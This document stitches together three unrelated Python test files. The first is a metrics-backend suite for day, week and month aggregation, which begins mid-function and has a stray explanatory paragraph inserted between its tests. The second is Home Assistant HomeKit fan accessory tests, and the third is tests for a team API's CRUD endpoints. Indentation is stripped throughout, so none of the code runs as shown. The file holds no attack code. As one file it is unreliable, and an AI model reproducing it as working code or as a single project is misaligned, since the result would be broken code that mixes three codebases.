eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2, metric2
series, values = self._backend.get_metric_by_day(user_id2, metric2, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
def test_get_counts_after_set_metric_by_day(self):
user_id = 1234
metric = "badge:25"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=5))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=9), 2))
count = self._backend.get_count(user_id, metric)
#count should be at 6
eq_(count, 6)
def test_get_counts_after_set_metric_by_day_update_counter_false(self):
user_id = 1234
metric = "badge:25"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=5))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=5), 2, update_counter=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=7), 2, update_counter=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2012, month=4, day=9), 2, update_counter=False))
count = self._backend.get_count(user_id, metric)
#count should be at 10
eq_(count, 10)
def test_sync_agg_metric(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 5)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 5)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 10)
eq_(values["2012-01-01"], 0)
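The weekly keys asserted above ("2011-12-05", "2011-12-12", ...) are always Mondays, and the monthly keys ("2011-12-01") are always the first of the month, so the sync step evidently rolls daily values up into Monday-anchored week buckets and first-of-month buckets. The bucketing can be sketched as (inferred from the assertions, not the backend's code):

```python
import datetime

def week_bucket(day):
    """Monday-of-week key, matching the weekly assertions above."""
    monday = day - datetime.timedelta(days=day.weekday())
    return monday.strftime("%Y-%m-%d")

def month_bucket(day):
    """First-of-month key, matching the monthly assertions above."""
    return day.replace(day=1).strftime("%Y-%m-%d")
```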
def test_no_sync_with_set_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 0)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 0)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 0)
eq_(values["2012-01-01"], 0)
def test_sync_agg_metric_localized_scope(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.datetime(year=2011, month=12, day=5)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=1), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=15), 3, sync_agg=True))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2011-12-05"], 0)
eq_(values["2011-12-12"], 3)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 0)
eq_(values["2012-01-02"], 0)
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=2)
eq_(len(series), 2)
eq_(values["2011-12-01"], 5) # The first set metric to 2 will be calculated when the sync is called for the second set call
eq_(values["2012-01-01"], 0)
def test_sync_agg_metric_for_multi_users_at_the_same_time_with_sync(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), 3))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30), 1))
#user_id
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 12)
#user_id2
series, values = self._backend.get_metric_by_month(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 12)
def test_sync_agg_metric_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), 2))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), 3))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), 5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=5, group_by="week")
#metric
eq_(len(results[0][0]), 5)
eq_(len(results[0][1].keys()), 5)
eq_(results[0][1]["2011-12-05"], 5)
eq_(results[0][1]["2011-12-26"], 5)
#metric 2
eq_(len(results[1][0]), 5)
eq_(len(results[1][1].keys()), 5)
eq_(results[1][1]["2011-12-05"], 5)
eq_(results[1][1]["2011-12-26"], 5)
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=1, group_by="month")
#metric
eq_(len(results[0][0]), 1)
eq_(len(results[0][1].keys()), 1)
eq_(results[0][1]["2011-12-01"], 10)
#metric 2
eq_(len(results[1][0]), 1)
eq_(len(results[1][1].keys()), 1)
eq_(results[1][1]["2011-12-01"], 10)
def test_sync_agg_metric_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), 2))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), 3))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30), 1))
#user_id, metric
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2, metric
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id, metric2
series, values = self._backend.get_metric_by_week(user_id, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
#user_id2, metric2
series, values = self._backend.get_metric_by_week(user_id2, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
# tests/components/homekit/test_type_fans.py
"""Test different accessory types: Fans."""
from pyhap.const import HAP_REPR_AID, HAP_REPR_CHARS, HAP_REPR_IID, HAP_REPR_VALUE
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_OSCILLATING,
ATTR_PERCENTAGE,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN,
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
)
from homeassistant.components.homekit.const import ATTR_VALUE
from homeassistant.components.homekit.type_fans import Fan
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
EVENT_HOMEASSISTANT_START,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
)
from homeassistant.core import CoreState
from homeassistant.helpers import entity_registry
from tests.common import async_mock_service
async def test_fan_basic(hass, hk_driver, events):
"""Test fan with char state."""
entity_id = "fan.demo"
hass.states.async_set(entity_id, STATE_ON, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.aid == 1
assert acc.category == 3 # Fan
assert acc.char_active.value == 1
# If there are no speed_list values, then HomeKit speed is unsupported
assert acc.char_speed is None
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_active.value == 1
hass.states.async_set(entity_id, STATE_OFF, {ATTR_SUPPORTED_FEATURES: 0})
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_set(entity_id, STATE_UNKNOWN)
await hass.async_block_till_done()
assert acc.char_active.value == 0
hass.states.async_remove(entity_id)
await hass.async_block_till_done()
assert acc.char_active.value == 0
# Set from HomeKit
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_on
assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is None
hass.states.async_set(entity_id, STATE_ON)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is None
async def test_fan_direction(hass, hk_driver, events):
"""Test fan with direction."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_DIRECTION, ATTR_DIRECTION: DIRECTION_FORWARD},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_direction.value == 0
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_direction.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_DIRECTION: DIRECTION_REVERSE})
await hass.async_block_till_done()
assert acc.char_direction.value == 1
# Set from HomeKit
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_FORWARD
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == DIRECTION_FORWARD
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_direction.client_update_value, 1)
await hass.async_block_till_done()
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] == DIRECTION_REVERSE
async def test_fan_oscillate(hass, hk_driver, events):
"""Test fan with oscillate."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_OSCILLATE, ATTR_OSCILLATING: False},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_swing.value == 0
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_swing.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_OSCILLATING: True})
await hass.async_block_till_done()
assert acc.char_swing.value == 1
# Set from HomeKit
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 0)
await hass.async_block_till_done()
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is False
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is False
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 1)
await hass.async_block_till_done()
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is True
async def test_fan_speed(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED,
ATTR_PERCENTAGE: 0,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
await acc.run_handler()
await hass.async_block_till_done()
hass.states.async_set(entity_id, STATE_ON, {ATTR_PERCENTAGE: 100})
await hass.async_block_till_done()
assert acc.char_speed.value == 100
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_speed.client_update_value, 42)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == 42
# Verify speed is preserved from off to on
hass.states.async_set(entity_id, STATE_OFF, {ATTR_PERCENTAGE: 42})
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 0
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
async def test_fan_set_all_one_shot(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
await acc.run_handler()
await hass.async_block_till_done()
hass.states.async_set(
entity_id,
STATE_OFF,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert not call_turn_on
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is True
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 3
assert events[0].data[ATTR_VALUE] is True
assert events[1].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[2].data[ATTR_VALUE] == 42
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
# Turn on should not be called if it's already on
# and we set a fan speed
await hass.async_block_till_done()
assert len(events) == 6
assert call_set_percentage[1]
assert call_set_percentage[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[1].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert events[-3].data[ATTR_VALUE] is True
assert events[-2].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[-1].data[ATTR_VALUE] == 42
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert len(events) == 7
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(call_set_percentage) == 2
assert len(call_oscillate) == 2
assert len(call_set_direction) == 2
async def test_fan_restore(hass, hk_driver, events):
"""Test setting up an entity from state in the event registry."""
hass.state = CoreState.not_running
registry = await entity_registry.async_get_registry(hass)
registry.async_get_or_create(
"fan",
"generic",
"1234",
suggested_object_id="simple",
)
registry.async_get_or_create(
"fan",
"generic",
"9012",
suggested_object_id="all_info_set",
capabilities={"speed_list": ["off", "low", "medium", "high"]},
supported_features=SUPPORT_SET_SPEED | SUPPORT_OSCILLATE | SUPPORT_DIRECTION,
device_class="mock-device-class",
)
hass.bus.async_fire(EVENT_HOMEASSISTANT_START, {})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", "fan.simple", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is None
assert acc.char_speed is None
assert acc.char_swing is None
acc = Fan(hass, hk_driver, "Fan", "fan.all_info_set", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is not None
assert acc.char_speed is not None
assert acc.char_swing is not None
# tests/test_api_teams.py (repo: jroimartin/graph-asset-inventory-api, license: MIT)
"""Tests for the Asset Inventory API."""
import json
from helpers import compare_unsorted_list
from graph_asset_inventory_api.api import TeamReq
def test_get_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams``."""
resp = flask_cli.get('/v1/teams')
data = json.loads(resp.data)
assert compare_unsorted_list(
data, init_api_teams, lambda x: x['id'])
def test_get_teams_pagination(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams`` with pagination."""
resp = flask_cli.get('/v1/teams?page=1&size=2')
data = json.loads(resp.data)
assert compare_unsorted_list(
data, init_api_teams[2:4], lambda x: x['id'])
def test_get_teams_pagination_missing_size(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams`` with pagination when the size
parameter is not specified."""
resp = flask_cli.get('/v1/teams?page=0')
data = json.loads(resp.data)
assert compare_unsorted_list(data, init_api_teams, lambda x: x['id'])
def test_post_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams``."""
team_req = TeamReq('new_identifier', 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 201
created_team = json.loads(resp.data)
assert created_team['id'] is not None
assert created_team['identifier'] == team_req.identifier
assert created_team['name'] == team_req.name
final_teams = init_api_teams + [created_team]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
def test_post_teams_conflict_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams`` with an already existing
identifier."""
team_req = TeamReq(init_api_teams[2]['identifier'], 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 409
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_post_teams_empty_identifier_name(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams`` with an empty identifier or
name string."""
# Empty identifier.
team_req = TeamReq('', 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 400
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
# Empty name.
team_req = TeamReq('new_identifier', '')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 400
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_get_teams_id(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams/{id}``."""
team_id = init_api_teams[2]['id']
resp = flask_cli.get(f'/v1/teams/{team_id}')
data = json.loads(resp.data)
assert data == init_api_teams[2]
def test_get_teams_id_not_found_error(flask_cli):
"""Tests the API endpoint ``GET /v1/teams/{id} with an unknown id."""
resp = flask_cli.get('/v1/teams/13371337')
assert resp.status_code == 404
def test_delete_teams_id(flask_cli, init_api_teams):
"""Tests the API endpoint ``DELETE /v1/teams/{id}``."""
team_id = init_api_teams[2]['id']
resp = flask_cli.delete(f'/v1/teams/{team_id}')
assert resp.status_code == 204
final_teams = init_api_teams[:2] + init_api_teams[3:]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
def test_delete_teams_id_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``DELETE /v1/teams/{id}`` with an unknown id."""
resp = flask_cli.delete('/v1/teams/13371337')
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_put_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams``."""
team_id = init_api_teams[2]['id']
team_req = TeamReq(init_api_teams[2]['identifier'], 'new_name')
resp = flask_cli.put(
f'/v1/teams/{team_id}',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 200
updated_team = json.loads(resp.data)
assert updated_team['id'] == team_id
assert updated_team['identifier'] == team_req.identifier
assert updated_team['name'] == team_req.name
final_teams = init_api_teams[:2] + init_api_teams[3:] + [updated_team]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
